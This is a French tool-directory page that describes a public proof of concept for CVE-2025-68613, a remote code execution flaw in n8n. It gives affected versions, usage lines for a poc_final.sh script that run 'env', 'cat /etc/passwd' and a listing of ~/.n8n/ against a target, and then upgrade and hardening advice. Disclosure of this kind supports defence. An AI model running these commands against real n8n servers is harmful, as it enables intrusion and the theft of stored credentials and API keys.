Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-68613 — CVE-2025-68613 — n8n RCE par injection d'expression | Kitploit
Outils/GitHubGitHub/h3raklez/cve-2025-68613
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleApprentissage et Éducation
GitHubh3raklez/cve-2025-68613

CVE-2025-68613

CVE-2025-68613 — n8n RCE par injection d'expression

Voir le dépôt
il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-68613 — n8n RCE via Injection d'Expression

À des fins éducatives et de recherche en sécurité autorisée uniquement.

Aperçu

Vulnérabilité RCE critique (CVSS 9.9) dans la plateforme d'automatisation de workflows n8n. Les utilisateurs authentifiés peuvent exécuter des commandes OS arbitraires via le nœud executeCommand, contournant les restrictions du bac à sable.

ChampDétail
CVECVE-2025-68613
CVSS9.9 (Critique)
Versions concernées>= 0.211.0 < 1.120.4
Authentification requiseOui (tout utilisateur disposant des permissions de création de workflows)
Testé surn8n 1.119.1
Corrigé dans1.120.4, 1.121.1, 1.122.0

Fonctionnement

n8n évalue les paramètres des nœuds de workflow côté serveur. Le nœud executeCommand exécute des commandes shell directement sur l'hôte avec les privilèges du processus n8n. Tout utilisateur authentifié disposant des permissions de création ou d'édition de workflows peut en abuser pour obtenir un RCE complet.

Utilisation

root@kitploit:~
bash poc_final.sh <target> <email> <password> <command>

Exemples :

root@kitploit:~
# Basic RCE
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'id'

# Read environment variables (may contain credentials/API keys)
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'env'

# Read sensitive files
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'cat /etc/passwd'

# List n8n data directory
bash poc_final.sh http://target:5678 [email protected] 'Password1!' 'ls -la ~/.n8n/'

Remarque : Si votre mot de passe contient des caractères spéciaux comme !, utilisez des guillemets simples.

Correction

Mettez à jour vers n8n >= 1.120.4 immédiatement.

Si la mise à jour n'est pas immédiatement possible :

  • Limitez la création et l'édition de workflows aux seuls utilisateurs de confiance
  • Exécutez n8n avec des privilèges OS minimaux
  • Utilisez la segmentation réseau pour limiter l'exposition

Références

  • Avis de sécurité n8n GHSA-v98v-ff95-f3cp
  • NVD — CVE-2025-68613

Avertissement

Cet outil est fourni uniquement à des fins éducatives et de tests de sécurité autorisés. Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas d'autorisation écrite explicite pour tester est illégale. L'auteur n'est pas responsable de toute utilisation abusive.

Télécharger l’outil